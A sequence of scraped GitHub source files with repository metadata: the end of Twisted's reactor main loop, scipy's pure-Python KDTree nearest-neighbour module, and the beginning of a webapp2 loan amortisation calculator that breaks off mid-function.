self.startRunning(installSignalHandlers=installSignalHandlers)
self.mainLoop()
def mainLoop(self):
while self._started:
try:
while self._started:
# Advance simulation time in delayed event
# processors.
self.runUntilCurrent()
t2 = self.timeout()
t = self.running and t2
self.doIteration(t)
except:
log.msg("Unexpected error in main loop.")
log.err()
else:
log.msg('Main loop terminated.')
__all__ = []
| {
"content_hash": "4aab653bd536e2f6fad2765a25a342b4",
"timestamp": "",
"source": "github",
"line_count": 1260,
"max_line_length": 117,
"avg_line_length": 34.467460317460315,
"alnum_prop": 0.5992769808192683,
"repo_name": "EricMuller/mynotes-backend",
"id": "3e1c63cbf61fde8ff756daf70f946921ac3ccd35",
"size": "43587",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "requirements/twisted/Twisted-17.1.0/build/lib.linux-x86_64-3.5/twisted/internet/base.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "ApacheConf",
"bytes": "11880"
},
{
"name": "Batchfile",
"bytes": "3516"
},
{
"name": "C",
"bytes": "37168"
},
{
"name": "CSS",
"bytes": "6613"
},
{
"name": "DIGITAL Command Language",
"bytes": "1032"
},
{
"name": "GAP",
"bytes": "36244"
},
{
"name": "HTML",
"bytes": "233863"
},
{
"name": "Makefile",
"bytes": "6766"
},
{
"name": "Nginx",
"bytes": "998"
},
{
"name": "Objective-C",
"bytes": "2584"
},
{
"name": "Python",
"bytes": "22991176"
},
{
"name": "Roff",
"bytes": "160293"
},
{
"name": "Shell",
"bytes": "13496"
},
{
"name": "Smarty",
"bytes": "1366"
}
],
"symlink_target": ""
} |
from __future__ import division, print_function, absolute_import
import sys
import numpy as np
from heapq import heappush, heappop
import scipy.sparse
__all__ = ['minkowski_distance_p', 'minkowski_distance',
'distance_matrix',
'Rectangle', 'KDTree']
def minkowski_distance_p(x, y, p=2):
"""
Compute the p-th power of the L**p distance between two arrays.
For efficiency, this function computes the L**p distance but does
not extract the pth root. If `p` is 1 or infinity, this is equal to
the actual L**p distance.
Parameters
----------
x : (M, K) array_like
Input array.
y : (N, K) array_like
Input array.
p : float, 1 <= p <= infinity
Which Minkowski p-norm to use.
Examples
--------
>>> from scipy.spatial import minkowski_distance_p
>>> minkowski_distance_p([[0,0],[0,0]], [[1,1],[0,1]])
array([2, 1])
"""
x = np.asarray(x)
y = np.asarray(y)
# Find smallest common datatype with float64 (return type of this function) - addresses #10262.
# Don't just cast to float64 for complex input case.
common_datatype = np.promote_types(np.promote_types(x.dtype, y.dtype), 'float64')
# Make sure x and y are numpy arrays of correct datatype.
x = x.astype(common_datatype)
y = y.astype(common_datatype)
if p == np.inf:
return np.amax(np.abs(y-x), axis=-1)
elif p == 1:
return np.sum(np.abs(y-x), axis=-1)
else:
return np.sum(np.abs(y-x)**p, axis=-1)
def minkowski_distance(x, y, p=2):
"""
Compute the L**p distance between two arrays.
Parameters
----------
x : (M, K) array_like
Input array.
y : (N, K) array_like
Input array.
p : float, 1 <= p <= infinity
Which Minkowski p-norm to use.
Examples
--------
>>> from scipy.spatial import minkowski_distance
>>> minkowski_distance([[0,0],[0,0]], [[1,1],[0,1]])
array([ 1.41421356, 1. ])
"""
x = np.asarray(x)
y = np.asarray(y)
if p == np.inf or p == 1:
return minkowski_distance_p(x, y, p)
else:
return minkowski_distance_p(x, y, p)**(1./p)
class Rectangle(object):
"""Hyperrectangle class.
Represents a Cartesian product of intervals.
"""
def __init__(self, maxes, mins):
"""Construct a hyperrectangle."""
self.maxes = np.maximum(maxes,mins).astype(float)
self.mins = np.minimum(maxes,mins).astype(float)
self.m, = self.maxes.shape
def __repr__(self):
return "<Rectangle %s>" % list(zip(self.mins, self.maxes))
def volume(self):
"""Total volume."""
return np.prod(self.maxes-self.mins)
def split(self, d, split):
"""
Produce two hyperrectangles by splitting.
In general, if you need to compute maximum and minimum
distances to the children, it can be done more efficiently
by updating the maximum and minimum distances to the parent.
Parameters
----------
d : int
Axis to split hyperrectangle along.
split : float
Position along axis `d` to split at.
"""
mid = np.copy(self.maxes)
mid[d] = split
less = Rectangle(self.mins, mid)
mid = np.copy(self.mins)
mid[d] = split
greater = Rectangle(mid, self.maxes)
return less, greater
def min_distance_point(self, x, p=2.):
"""
Return the minimum distance between input and points in the hyperrectangle.
Parameters
----------
x : array_like
Input.
p : float, optional
Input.
"""
return minkowski_distance(0, np.maximum(0,np.maximum(self.mins-x,x-self.maxes)),p)
def max_distance_point(self, x, p=2.):
"""
Return the maximum distance between input and points in the hyperrectangle.
Parameters
----------
x : array_like
Input array.
p : float, optional
Input.
"""
return minkowski_distance(0, np.maximum(self.maxes-x,x-self.mins),p)
def min_distance_rectangle(self, other, p=2.):
"""
Compute the minimum distance between points in the two hyperrectangles.
Parameters
----------
other : hyperrectangle
Input.
p : float
Input.
"""
return minkowski_distance(0, np.maximum(0,np.maximum(self.mins-other.maxes,other.mins-self.maxes)),p)
def max_distance_rectangle(self, other, p=2.):
"""
Compute the maximum distance between points in the two hyperrectangles.
Parameters
----------
other : hyperrectangle
Input.
p : float, optional
Input.
"""
return minkowski_distance(0, np.maximum(self.maxes-other.mins,other.maxes-self.mins),p)
class KDTree(object):
"""
kd-tree for quick nearest-neighbor lookup
This class provides an index into a set of k-dimensional points which
can be used to rapidly look up the nearest neighbors of any point.
Parameters
----------
data : (N,K) array_like
The data points to be indexed. This array is not copied, and
so modifying this data will result in bogus results.
leafsize : int, optional
The number of points at which the algorithm switches over to
brute-force. Has to be positive.
Raises
------
RuntimeError
The maximum recursion limit can be exceeded for large data
sets. If this happens, either increase the value for the `leafsize`
parameter or increase the recursion limit by::
>>> import sys
>>> sys.setrecursionlimit(10000)
See Also
--------
cKDTree : Implementation of `KDTree` in Cython
Notes
-----
The algorithm used is described in Maneewongvatana and Mount 1999.
The general idea is that the kd-tree is a binary tree, each of whose
nodes represents an axis-aligned hyperrectangle. Each node specifies
an axis and splits the set of points based on whether their coordinate
along that axis is greater than or less than a particular value.
During construction, the axis and splitting point are chosen by the
"sliding midpoint" rule, which ensures that the cells do not all
become long and thin.
The tree can be queried for the r closest neighbors of any given point
(optionally returning only those within some maximum distance of the
point). It can also be queried, with a substantial gain in efficiency,
for the r approximate closest neighbors.
For large dimensions (20 is already large) do not expect this to run
significantly faster than brute force. High-dimensional nearest-neighbor
queries are a substantial open problem in computer science.
The tree also supports all-neighbors queries, both with arrays of points
and with other kd-trees. These do use a reasonably efficient algorithm,
but the kd-tree is not necessarily the best data structure for this
sort of calculation.
"""
def __init__(self, data, leafsize=10):
self.data = np.asarray(data)
self.n, self.m = np.shape(self.data)
self.leafsize = int(leafsize)
if self.leafsize < 1:
raise ValueError("leafsize must be at least 1")
self.maxes = np.amax(self.data,axis=0)
self.mins = np.amin(self.data,axis=0)
self.tree = self.__build(np.arange(self.n), self.maxes, self.mins)
class node(object):
if sys.version_info[0] >= 3:
def __lt__(self, other):
return id(self) < id(other)
def __gt__(self, other):
return id(self) > id(other)
def __le__(self, other):
return id(self) <= id(other)
def __ge__(self, other):
return id(self) >= id(other)
def __eq__(self, other):
return id(self) == id(other)
class leafnode(node):
def __init__(self, idx):
self.idx = idx
self.children = len(idx)
class innernode(node):
def __init__(self, split_dim, split, less, greater):
self.split_dim = split_dim
self.split = split
self.less = less
self.greater = greater
self.children = less.children+greater.children
def __build(self, idx, maxes, mins):
if len(idx) <= self.leafsize:
return KDTree.leafnode(idx)
else:
data = self.data[idx]
# maxes = np.amax(data,axis=0)
# mins = np.amin(data,axis=0)
d = np.argmax(maxes-mins)
maxval = maxes[d]
minval = mins[d]
if maxval == minval:
# all points are identical; warn user?
return KDTree.leafnode(idx)
data = data[:,d]
# sliding midpoint rule; see Maneewongvatana and Mount 1999
# for arguments that this is a good idea.
split = (maxval+minval)/2
less_idx = np.nonzero(data <= split)[0]
greater_idx = np.nonzero(data > split)[0]
if len(less_idx) == 0:
split = np.amin(data)
less_idx = np.nonzero(data <= split)[0]
greater_idx = np.nonzero(data > split)[0]
if len(greater_idx) == 0:
split = np.amax(data)
less_idx = np.nonzero(data < split)[0]
greater_idx = np.nonzero(data >= split)[0]
if len(less_idx) == 0:
# _still_ zero? all must have the same value
if not np.all(data == data[0]):
raise ValueError("Troublesome data array: %s" % data)
split = data[0]
less_idx = np.arange(len(data)-1)
greater_idx = np.array([len(data)-1])
lessmaxes = np.copy(maxes)
lessmaxes[d] = split
greatermins = np.copy(mins)
greatermins[d] = split
return KDTree.innernode(d, split,
self.__build(idx[less_idx],lessmaxes,mins),
self.__build(idx[greater_idx],maxes,greatermins))
def __query(self, x, k=1, eps=0, p=2, distance_upper_bound=np.inf):
side_distances = np.maximum(0,np.maximum(x-self.maxes,self.mins-x))
if p != np.inf:
side_distances **= p
min_distance = np.sum(side_distances)
else:
min_distance = np.amax(side_distances)
# priority queue for chasing nodes
# entries are:
# minimum distance between the cell and the target
# distances between the nearest side of the cell and the target
# the head node of the cell
q = [(min_distance,
tuple(side_distances),
self.tree)]
# priority queue for the nearest neighbors
# furthest known neighbor first
# entries are (-distance**p, i)
neighbors = []
if eps == 0:
epsfac = 1
elif p == np.inf:
epsfac = 1/(1+eps)
else:
epsfac = 1/(1+eps)**p
if p != np.inf and distance_upper_bound != np.inf:
distance_upper_bound = distance_upper_bound**p
while q:
min_distance, side_distances, node = heappop(q)
if isinstance(node, KDTree.leafnode):
# brute-force
data = self.data[node.idx]
ds = minkowski_distance_p(data,x[np.newaxis,:],p)
for i in range(len(ds)):
if ds[i] < distance_upper_bound:
if len(neighbors) == k:
heappop(neighbors)
heappush(neighbors, (-ds[i], node.idx[i]))
if len(neighbors) == k:
distance_upper_bound = -neighbors[0][0]
else:
# we don't push cells that are too far onto the queue at all,
# but since the distance_upper_bound decreases, we might get
# here even if the cell's too far
if min_distance > distance_upper_bound*epsfac:
# since this is the nearest cell, we're done, bail out
break
# compute minimum distances to the children and push them on
if x[node.split_dim] < node.split:
near, far = node.less, node.greater
else:
near, far = node.greater, node.less
# near child is at the same distance as the current node
heappush(q,(min_distance, side_distances, near))
# far child is further by an amount depending only
# on the split value
sd = list(side_distances)
if p == np.inf:
min_distance = max(min_distance, abs(node.split-x[node.split_dim]))
elif p == 1:
sd[node.split_dim] = np.abs(node.split-x[node.split_dim])
min_distance = min_distance - side_distances[node.split_dim] + sd[node.split_dim]
else:
sd[node.split_dim] = np.abs(node.split-x[node.split_dim])**p
min_distance = min_distance - side_distances[node.split_dim] + sd[node.split_dim]
# far child might be too far, if so, don't bother pushing it
if min_distance <= distance_upper_bound*epsfac:
heappush(q,(min_distance, tuple(sd), far))
if p == np.inf:
return sorted([(-d,i) for (d,i) in neighbors])
else:
return sorted([((-d)**(1./p),i) for (d,i) in neighbors])
def query(self, x, k=1, eps=0, p=2, distance_upper_bound=np.inf):
"""
Query the kd-tree for nearest neighbors
Parameters
----------
x : array_like, last dimension self.m
An array of points to query.
k : int, optional
The number of nearest neighbors to return.
eps : nonnegative float, optional
Return approximate nearest neighbors; the kth returned value
is guaranteed to be no further than (1+eps) times the
distance to the real kth nearest neighbor.
p : float, 1<=p<=infinity, optional
Which Minkowski p-norm to use.
1 is the sum-of-absolute-values "Manhattan" distance
2 is the usual Euclidean distance
infinity is the maximum-coordinate-difference distance
distance_upper_bound : nonnegative float, optional
Return only neighbors within this distance. This is used to prune
tree searches, so if you are doing a series of nearest-neighbor
queries, it may help to supply the distance to the nearest neighbor
of the most recent point.
Returns
-------
d : float or array of floats
The distances to the nearest neighbors.
If x has shape tuple+(self.m,), then d has shape tuple if
k is one, or tuple+(k,) if k is larger than one. Missing
neighbors (e.g. when k > n or distance_upper_bound is
given) are indicated with infinite distances. If k is None,
then d is an object array of shape tuple, containing lists
of distances. In either case the hits are sorted by distance
(nearest first).
i : integer or array of integers
The locations of the neighbors in self.data. i is the same
shape as d.
Examples
--------
>>> from scipy import spatial
>>> x, y = np.mgrid[0:5, 2:8]
>>> tree = spatial.KDTree(list(zip(x.ravel(), y.ravel())))
>>> tree.data
array([[0, 2],
[0, 3],
[0, 4],
[0, 5],
[0, 6],
[0, 7],
[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 2],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 2],
[3, 3],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 2],
[4, 3],
[4, 4],
[4, 5],
[4, 6],
[4, 7]])
>>> pts = np.array([[0, 0], [2.1, 2.9]])
>>> tree.query(pts)
(array([ 2. , 0.14142136]), array([ 0, 13]))
>>> tree.query(pts[0])
(2.0, 0)
"""
x = np.asarray(x)
if np.shape(x)[-1] != self.m:
raise ValueError("x must consist of vectors of length %d but has shape %s" % (self.m, np.shape(x)))
if p < 1:
raise ValueError("Only p-norms with 1<=p<=infinity permitted")
retshape = np.shape(x)[:-1]
if retshape != ():
if k is None:
dd = np.empty(retshape,dtype=object)
ii = np.empty(retshape,dtype=object)
elif k > 1:
dd = np.empty(retshape+(k,),dtype=float)
dd.fill(np.inf)
ii = np.empty(retshape+(k,),dtype=int)
ii.fill(self.n)
elif k == 1:
dd = np.empty(retshape,dtype=float)
dd.fill(np.inf)
ii = np.empty(retshape,dtype=int)
ii.fill(self.n)
else:
raise ValueError("Requested %s nearest neighbors; acceptable numbers are integers greater than or equal to one, or None")
for c in np.ndindex(retshape):
hits = self.__query(x[c], k=k, eps=eps, p=p, distance_upper_bound=distance_upper_bound)
if k is None:
dd[c] = [d for (d,i) in hits]
ii[c] = [i for (d,i) in hits]
elif k > 1:
for j in range(len(hits)):
dd[c+(j,)], ii[c+(j,)] = hits[j]
elif k == 1:
if len(hits) > 0:
dd[c], ii[c] = hits[0]
else:
dd[c] = np.inf
ii[c] = self.n
return dd, ii
else:
hits = self.__query(x, k=k, eps=eps, p=p, distance_upper_bound=distance_upper_bound)
if k is None:
return [d for (d,i) in hits], [i for (d,i) in hits]
elif k == 1:
if len(hits) > 0:
return hits[0]
else:
return np.inf, self.n
elif k > 1:
dd = np.empty(k,dtype=float)
dd.fill(np.inf)
ii = np.empty(k,dtype=int)
ii.fill(self.n)
for j in range(len(hits)):
dd[j], ii[j] = hits[j]
return dd, ii
else:
raise ValueError("Requested %s nearest neighbors; acceptable numbers are integers greater than or equal to one, or None")
def __query_ball_point(self, x, r, p=2., eps=0):
R = Rectangle(self.maxes, self.mins)
def traverse_checking(node, rect):
if rect.min_distance_point(x, p) > r / (1. + eps):
return []
elif rect.max_distance_point(x, p) < r * (1. + eps):
return traverse_no_checking(node)
elif isinstance(node, KDTree.leafnode):
d = self.data[node.idx]
return node.idx[minkowski_distance(d, x, p) <= r].tolist()
else:
less, greater = rect.split(node.split_dim, node.split)
return traverse_checking(node.less, less) + \
traverse_checking(node.greater, greater)
def traverse_no_checking(node):
if isinstance(node, KDTree.leafnode):
return node.idx.tolist()
else:
return traverse_no_checking(node.less) + \
traverse_no_checking(node.greater)
return traverse_checking(self.tree, R)
def query_ball_point(self, x, r, p=2., eps=0):
"""Find all points within distance r of point(s) x.
Parameters
----------
x : array_like, shape tuple + (self.m,)
The point or points to search for neighbors of.
r : positive float
The radius of points to return.
p : float, optional
Which Minkowski p-norm to use. Should be in the range [1, inf].
eps : nonnegative float, optional
Approximate search. Branches of the tree are not explored if their
nearest points are further than ``r / (1 + eps)``, and branches are
added in bulk if their furthest points are nearer than
``r * (1 + eps)``.
Returns
-------
results : list or array of lists
If `x` is a single point, returns a list of the indices of the
neighbors of `x`. If `x` is an array of points, returns an object
array of shape tuple containing lists of neighbors.
Notes
-----
If you have many points whose neighbors you want to find, you may save
substantial amounts of time by putting them in a KDTree and using
query_ball_tree.
Examples
--------
>>> from scipy import spatial
>>> x, y = np.mgrid[0:5, 0:5]
>>> points = np.c_[x.ravel(), y.ravel()]
>>> tree = spatial.KDTree(points)
>>> tree.query_ball_point([2, 0], 1)
[5, 10, 11, 15]
Query multiple points and plot the results:
>>> import matplotlib.pyplot as plt
>>> points = np.asarray(points)
>>> plt.plot(points[:,0], points[:,1], '.')
>>> for results in tree.query_ball_point(([2, 0], [3, 3]), 1):
... nearby_points = points[results]
... plt.plot(nearby_points[:,0], nearby_points[:,1], 'o')
>>> plt.margins(0.1, 0.1)
>>> plt.show()
"""
x = np.asarray(x)
if x.shape[-1] != self.m:
raise ValueError("Searching for a %d-dimensional point in a "
"%d-dimensional KDTree" % (x.shape[-1], self.m))
if len(x.shape) == 1:
return self.__query_ball_point(x, r, p, eps)
else:
retshape = x.shape[:-1]
result = np.empty(retshape, dtype=object)
for c in np.ndindex(retshape):
result[c] = self.__query_ball_point(x[c], r, p=p, eps=eps)
return result
def query_ball_tree(self, other, r, p=2., eps=0):
"""Find all pairs of points whose distance is at most r
Parameters
----------
other : KDTree instance
The tree containing points to search against.
r : float
The maximum distance, has to be positive.
p : float, optional
Which Minkowski norm to use. `p` has to meet the condition
``1 <= p <= infinity``.
eps : float, optional
Approximate search. Branches of the tree are not explored
if their nearest points are further than ``r/(1+eps)``, and
branches are added in bulk if their furthest points are nearer
than ``r * (1+eps)``. `eps` has to be non-negative.
Returns
-------
results : list of lists
For each element ``self.data[i]`` of this tree, ``results[i]`` is a
list of the indices of its neighbors in ``other.data``.
"""
results = [[] for i in range(self.n)]
def traverse_checking(node1, rect1, node2, rect2):
if rect1.min_distance_rectangle(rect2, p) > r/(1.+eps):
return
elif rect1.max_distance_rectangle(rect2, p) < r*(1.+eps):
traverse_no_checking(node1, node2)
elif isinstance(node1, KDTree.leafnode):
if isinstance(node2, KDTree.leafnode):
d = other.data[node2.idx]
for i in node1.idx:
results[i] += node2.idx[minkowski_distance(d,self.data[i],p) <= r].tolist()
else:
less, greater = rect2.split(node2.split_dim, node2.split)
traverse_checking(node1,rect1,node2.less,less)
traverse_checking(node1,rect1,node2.greater,greater)
elif isinstance(node2, KDTree.leafnode):
less, greater = rect1.split(node1.split_dim, node1.split)
traverse_checking(node1.less,less,node2,rect2)
traverse_checking(node1.greater,greater,node2,rect2)
else:
less1, greater1 = rect1.split(node1.split_dim, node1.split)
less2, greater2 = rect2.split(node2.split_dim, node2.split)
traverse_checking(node1.less,less1,node2.less,less2)
traverse_checking(node1.less,less1,node2.greater,greater2)
traverse_checking(node1.greater,greater1,node2.less,less2)
traverse_checking(node1.greater,greater1,node2.greater,greater2)
def traverse_no_checking(node1, node2):
if isinstance(node1, KDTree.leafnode):
if isinstance(node2, KDTree.leafnode):
for i in node1.idx:
results[i] += node2.idx.tolist()
else:
traverse_no_checking(node1, node2.less)
traverse_no_checking(node1, node2.greater)
else:
traverse_no_checking(node1.less, node2)
traverse_no_checking(node1.greater, node2)
traverse_checking(self.tree, Rectangle(self.maxes, self.mins),
other.tree, Rectangle(other.maxes, other.mins))
return results
def query_pairs(self, r, p=2., eps=0):
"""
Find all pairs of points within a distance.
Parameters
----------
r : positive float
The maximum distance.
p : float, optional
Which Minkowski norm to use. `p` has to meet the condition
``1 <= p <= infinity``.
eps : float, optional
Approximate search. Branches of the tree are not explored
if their nearest points are further than ``r/(1+eps)``, and
branches are added in bulk if their furthest points are nearer
than ``r * (1+eps)``. `eps` has to be non-negative.
Returns
-------
results : set
Set of pairs ``(i,j)``, with ``i < j``, for which the corresponding
positions are close.
"""
results = set()
def traverse_checking(node1, rect1, node2, rect2):
if rect1.min_distance_rectangle(rect2, p) > r/(1.+eps):
return
elif rect1.max_distance_rectangle(rect2, p) < r*(1.+eps):
traverse_no_checking(node1, node2)
elif isinstance(node1, KDTree.leafnode):
if isinstance(node2, KDTree.leafnode):
# Special care to avoid duplicate pairs
if id(node1) == id(node2):
d = self.data[node2.idx]
for i in node1.idx:
for j in node2.idx[minkowski_distance(d,self.data[i],p) <= r]:
if i < j:
results.add((i,j))
else:
d = self.data[node2.idx]
for i in node1.idx:
for j in node2.idx[minkowski_distance(d,self.data[i],p) <= r]:
if i < j:
results.add((i,j))
elif j < i:
results.add((j,i))
else:
less, greater = rect2.split(node2.split_dim, node2.split)
traverse_checking(node1,rect1,node2.less,less)
traverse_checking(node1,rect1,node2.greater,greater)
elif isinstance(node2, KDTree.leafnode):
less, greater = rect1.split(node1.split_dim, node1.split)
traverse_checking(node1.less,less,node2,rect2)
traverse_checking(node1.greater,greater,node2,rect2)
else:
less1, greater1 = rect1.split(node1.split_dim, node1.split)
less2, greater2 = rect2.split(node2.split_dim, node2.split)
traverse_checking(node1.less,less1,node2.less,less2)
traverse_checking(node1.less,less1,node2.greater,greater2)
# Avoid traversing (node1.less, node2.greater) and
# (node1.greater, node2.less) (it's the same node pair twice
# over, which is the source of the complication in the
# original KDTree.query_pairs)
if id(node1) != id(node2):
traverse_checking(node1.greater,greater1,node2.less,less2)
traverse_checking(node1.greater,greater1,node2.greater,greater2)
def traverse_no_checking(node1, node2):
if isinstance(node1, KDTree.leafnode):
if isinstance(node2, KDTree.leafnode):
# Special care to avoid duplicate pairs
if id(node1) == id(node2):
for i in node1.idx:
for j in node2.idx:
if i < j:
results.add((i,j))
else:
for i in node1.idx:
for j in node2.idx:
if i < j:
results.add((i,j))
elif j < i:
results.add((j,i))
else:
traverse_no_checking(node1, node2.less)
traverse_no_checking(node1, node2.greater)
else:
# Avoid traversing (node1.less, node2.greater) and
# (node1.greater, node2.less) (it's the same node pair twice
# over, which is the source of the complication in the
# original KDTree.query_pairs)
if id(node1) == id(node2):
traverse_no_checking(node1.less, node2.less)
traverse_no_checking(node1.less, node2.greater)
traverse_no_checking(node1.greater, node2.greater)
else:
traverse_no_checking(node1.less, node2)
traverse_no_checking(node1.greater, node2)
traverse_checking(self.tree, Rectangle(self.maxes, self.mins),
self.tree, Rectangle(self.maxes, self.mins))
return results
def count_neighbors(self, other, r, p=2.):
"""
Count how many nearby pairs can be formed.
Count the number of pairs (x1,x2) can be formed, with x1 drawn
from self and x2 drawn from ``other``, and where
``distance(x1, x2, p) <= r``.
This is the "two-point correlation" described in Gray and Moore 2000,
"N-body problems in statistical learning", and the code here is based
on their algorithm.
Parameters
----------
other : KDTree instance
The other tree to draw points from.
r : float or one-dimensional array of floats
The radius to produce a count for. Multiple radii are searched with
a single tree traversal.
p : float, 1<=p<=infinity, optional
Which Minkowski p-norm to use
Returns
-------
result : int or 1-D array of ints
The number of pairs. Note that this is internally stored in a numpy
int, and so may overflow if very large (2e9).
"""
def traverse(node1, rect1, node2, rect2, idx):
min_r = rect1.min_distance_rectangle(rect2,p)
max_r = rect1.max_distance_rectangle(rect2,p)
c_greater = r[idx] > max_r
result[idx[c_greater]] += node1.children*node2.children
idx = idx[(min_r <= r[idx]) & (r[idx] <= max_r)]
if len(idx) == 0:
return
if isinstance(node1,KDTree.leafnode):
if isinstance(node2,KDTree.leafnode):
ds = minkowski_distance(self.data[node1.idx][:,np.newaxis,:],
other.data[node2.idx][np.newaxis,:,:],
p).ravel()
ds.sort()
result[idx] += np.searchsorted(ds,r[idx],side='right')
else:
less, greater = rect2.split(node2.split_dim, node2.split)
traverse(node1, rect1, node2.less, less, idx)
traverse(node1, rect1, node2.greater, greater, idx)
else:
if isinstance(node2,KDTree.leafnode):
less, greater = rect1.split(node1.split_dim, node1.split)
traverse(node1.less, less, node2, rect2, idx)
traverse(node1.greater, greater, node2, rect2, idx)
else:
less1, greater1 = rect1.split(node1.split_dim, node1.split)
less2, greater2 = rect2.split(node2.split_dim, node2.split)
traverse(node1.less,less1,node2.less,less2,idx)
traverse(node1.less,less1,node2.greater,greater2,idx)
traverse(node1.greater,greater1,node2.less,less2,idx)
traverse(node1.greater,greater1,node2.greater,greater2,idx)
R1 = Rectangle(self.maxes, self.mins)
R2 = Rectangle(other.maxes, other.mins)
if np.shape(r) == ():
r = np.array([r])
result = np.zeros(1,dtype=int)
traverse(self.tree, R1, other.tree, R2, np.arange(1))
return result[0]
elif len(np.shape(r)) == 1:
r = np.asarray(r)
n, = r.shape
result = np.zeros(n,dtype=int)
traverse(self.tree, R1, other.tree, R2, np.arange(n))
return result
else:
raise ValueError("r must be either a single value or a one-dimensional array of values")
def sparse_distance_matrix(self, other, max_distance, p=2.):
"""
Compute a sparse distance matrix
Computes a distance matrix between two KDTrees, leaving as zero
any distance greater than max_distance.
Parameters
----------
other : KDTree
max_distance : positive float
p : float, optional
Returns
-------
result : dok_matrix
Sparse matrix representing the results in "dictionary of keys" format.
"""
result = scipy.sparse.dok_matrix((self.n,other.n))
def traverse(node1, rect1, node2, rect2):
if rect1.min_distance_rectangle(rect2, p) > max_distance:
return
elif isinstance(node1, KDTree.leafnode):
if isinstance(node2, KDTree.leafnode):
for i in node1.idx:
for j in node2.idx:
d = minkowski_distance(self.data[i],other.data[j],p)
if d <= max_distance:
result[i,j] = d
else:
less, greater = rect2.split(node2.split_dim, node2.split)
traverse(node1,rect1,node2.less,less)
traverse(node1,rect1,node2.greater,greater)
elif isinstance(node2, KDTree.leafnode):
less, greater = rect1.split(node1.split_dim, node1.split)
traverse(node1.less,less,node2,rect2)
traverse(node1.greater,greater,node2,rect2)
else:
less1, greater1 = rect1.split(node1.split_dim, node1.split)
less2, greater2 = rect2.split(node2.split_dim, node2.split)
traverse(node1.less,less1,node2.less,less2)
traverse(node1.less,less1,node2.greater,greater2)
traverse(node1.greater,greater1,node2.less,less2)
traverse(node1.greater,greater1,node2.greater,greater2)
traverse(self.tree, Rectangle(self.maxes, self.mins),
other.tree, Rectangle(other.maxes, other.mins))
return result
def distance_matrix(x, y, p=2, threshold=1000000):
"""
Compute the distance matrix.
Returns the matrix of all pair-wise distances.
Parameters
----------
x : (M, K) array_like
Matrix of M vectors in K dimensions.
y : (N, K) array_like
Matrix of N vectors in K dimensions.
p : float, 1 <= p <= infinity
Which Minkowski p-norm to use.
threshold : positive int
If ``M * N * K`` > `threshold`, algorithm uses a Python loop instead
of large temporary arrays.
Returns
-------
result : (M, N) ndarray
Matrix containing the distance from every vector in `x` to every vector
in `y`.
Examples
--------
>>> from scipy.spatial import distance_matrix
>>> distance_matrix([[0,0],[0,1]], [[1,0],[1,1]])
array([[ 1. , 1.41421356],
[ 1.41421356, 1. ]])
"""
x = np.asarray(x)
m, k = x.shape
y = np.asarray(y)
n, kk = y.shape
if k != kk:
raise ValueError("x contains %d-dimensional vectors but y contains %d-dimensional vectors" % (k, kk))
if m*n*k <= threshold:
return minkowski_distance(x[:,np.newaxis,:],y[np.newaxis,:,:],p)
else:
result = np.empty((m,n),dtype=float) # FIXME: figure out the best dtype
if m < n:
for i in range(m):
result[i,:] = minkowski_distance(x[i],y,p)
else:
for j in range(n):
result[:,j] = minkowski_distance(x,y[j],p)
return result
| {
"content_hash": "97379c164c244fb6a2d145ef7432eeae",
"timestamp": "",
"source": "github",
"line_count": 994,
"max_line_length": 137,
"avg_line_length": 38.627766599597585,
"alnum_prop": 0.5262787790394833,
"repo_name": "jor-/scipy",
"id": "239438686bdc20778e9811db48cdb8ada57652b6",
"size": "38466",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "scipy/spatial/kdtree.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4395724"
},
{
"name": "C++",
"bytes": "649714"
},
{
"name": "Dockerfile",
"bytes": "1236"
},
{
"name": "Fortran",
"bytes": "5367732"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "12479679"
},
{
"name": "Shell",
"bytes": "538"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
} |
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'libs'))
import logging
import datetime
import json
from functools import partial
from operator import itemgetter
from decimal import Decimal as D, InvalidOperation
from collections import defaultdict, namedtuple
import jinja2
import webapp2
from wtforms import Form, DecimalField, IntegerField, RadioField, DateField
from wtforms.validators import InputRequired, Optional
Installment = namedtuple('Installment', (
'year',
'month',
'original_balance',
'principal',
'interest',
'monthly_installment',
'current_balance',
)
)
tojson = partial(json.dumps, default=lambda obj: '{:.2f}'.format(obj) if isinstance(obj, D) else obj)
currency_format = lambda val: '{:,.2f}'.format(val) if isinstance(val, (float, D)) else val
TEMPLATE_DIR = os.path.join(os.path.dirname(__file__), 'templates')
JINJA_ENV = jinja2.Environment(loader=jinja2.FileSystemLoader(TEMPLATE_DIR),
extensions=['jinja2.ext.autoescape'], autoescape=True)
JINJA_ENV.filters['tojson'] = tojson
JINJA_ENV.filters['currency_format'] = currency_format
YEARS = 'Y'
MONTHS = 'M'
PERIOD_TYPE_CHOICES = [
(YEARS, 'Years'),
(MONTHS, 'Months'),
]
class ScheduleForm(Form):
amount = DecimalField('Loan Amount:',
[InputRequired()],
default=D(500000),
)
interest_rate = DecimalField('Interest Rate:',
[InputRequired()],
default=D('12.5'),
)
period = IntegerField('Loan Period:',
[InputRequired()],
default=5,
)
period_type = RadioField('Period Type',
[InputRequired()],
choices=PERIOD_TYPE_CHOICES,
default=YEARS,
)
start_date = DateField('Start Date:',
[Optional()],
default=datetime.date.today,
format='%d/%m/%Y',
)
def render_template(template_name, **ctx):
template = JINJA_ENV.get_template(template_name)
return template.render(ctx)
def next_month(year, month):
if month == 12:
nmonth = 1
nyear = year + 1
else:
nmonth = month + 1
nyear = year
return nyear, nmonth
def generate_schedule(amount, interest_rate, period, period_type='Y', start_date=None):
_loan_paid_indicator = D('0.00')
n = period
if period_type == 'Y':
n = period * 12
mir = (interest_rate / 100) / 12
discount_factor = (((1 + mir) ** n) - 1) / (mir * (1 + mir) ** n)
monthly_installment = amount / discount_factor
if start_date is None:
start_date = datetime.date.today()
installments = []
current_balance = original_balance = amount
year = start_date.year
month = start_date.month
while current_balance >= _loan_paid_indicator:
interest = current_balance * mir
principal = monthly_installment - interest
original_balance = current_balance
current_balance -= principal
